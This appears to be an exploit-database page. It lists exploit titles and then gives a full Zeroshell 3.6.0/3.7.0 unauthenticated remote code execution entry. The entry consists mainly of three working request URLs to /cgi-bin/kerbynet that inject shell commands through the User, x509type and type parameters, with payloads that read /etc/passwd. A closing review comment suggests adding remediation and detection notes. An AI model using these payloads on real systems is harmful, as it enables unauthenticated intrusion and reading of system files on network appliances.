
3 new exploits

Mozilla Firefox < 50.1.0 - Use After Free
Cisco Firepower Management Console 6.0 - Post Authentication UserAdd
QuoteBook - 'poll.inc' Remote Config File Disclosure
QuoteBook - Remote Config File Disclosure
PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection
Pizzis CMS 1.5.1 - (visualizza.php idvar) Blind SQL Injection
PHP-Fusion Mod vArcade 1.8 - 'comment_id' Parameter SQL Injection
Pizzis CMS 1.5.1 - Blind SQL Injection
Joomla! Component com_xevidmegahd - 'catid' SQL Injection
Joomla! Component com_xevidmegahd - SQL Injection
DZcms 3.1 - (products.php pcat) SQL Injection
DZcms 3.1 - SQL Injection
phpMDJ 1.0.3 - (id_animateur) Blind SQL Injection
XOOPS Module tadbook2 - 'open_book.php book_sn' SQL Injection
phpMDJ 1.0.3 - 'id_animateur' Parameter Blind SQL Injection
XOOPS Module tadbook2 - SQL Injection
PHP-Fusion Mod the_kroax - 'comment_id' Parameter SQL Injection
Social Engine - 'browse_classifieds.php s' SQL Injection
PHP-Fusion Mod the_kroax - SQL Injection
Social Engine - SQL Injection
Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution
71 lines
2.3 KiB
Text
Executable file
####################################################################################################################################
# Exploit Title: Zeroshell - Net Services Unauthenticated Remote Code Execution | RCE
# Date: 13.01.2017
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.zeroshell.org
# Software Link: www.zeroshell.org/download/
# Version: 3.6.0 & 3.7.0
####################################################################################################################################
Introduction
Zeroshell is a small Linux distribution for servers and embedded devices with the aim to provide network services. It is available in the form of live CD or compact Flash image and it can be configured using a web browser. The main features of Zeroshell include: load balancing and failover of multiple Internet connections, UMTS/HSDPA connections by using 3G modems, RADIUS server for providing secure authentication and automatic management of encryption keys to wireless networks, captive portal to support web login, and many others.
Vulnerabilities: Unauthenticated Remote Code Execution | RCE
RCE details:
####################################################################################################################################
RCE 1
URL
http://192.168.0.75/cgi-bin/kerbynet?Action=StartSessionSubmit&User=%27%26cat%20/etc/passwd%26%27&PW=
METHOD
Get,Post
PARAMETER
User
PAYLOAD
%27%26cat%20/etc/passwd%26%27
####################################################################################################################################
RCE 2
URL
http://192.168.0.75/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%26cat%20/etc/passwd%26%27
METHOD
Get
PARAMETER
x509type
PAYLOAD
%27%26cat%20/etc/passwd%26%27
####################################################################################################################################
RCE 3
URL
http://192.168.0.75/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22%26cat%20/etc/passwd%26%22
METHOD
Get
PARAMETER
type
PAYLOAD
%22%26cat%20/etc/passwd%26%22
####################################################################################################################################
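Review bot: The header block stops at "Version: 3.6.0 & 3.7.0" with no line saying whether a fixed release or vendor advisory exists, so a reader triaging this entry cannot tell what to upgrade to; add a remediation line there, or state that no fix was known as of the 13.01.2017 date. The three RCE sections also never name the cause their payloads suggest: each wraps a command in a quote and an ampersand (%27%26...%26%27 in User and x509type, %22%26...%26%22 in type), which reads as these parameters reaching a quoted shell argument in /cgi-bin/kerbynet unsanitized. Stating that once, and noting that RCE 2 and RCE 3 pass Section=NoAuthREQ while RCE 1 uses Action=StartSessionSubmit, would give defenders what they need to match kerbynet requests carrying encoded quotes or ampersands in those parameters. Minor: "Software Link" lacks the http:// scheme that "Vendor Homepage" carries.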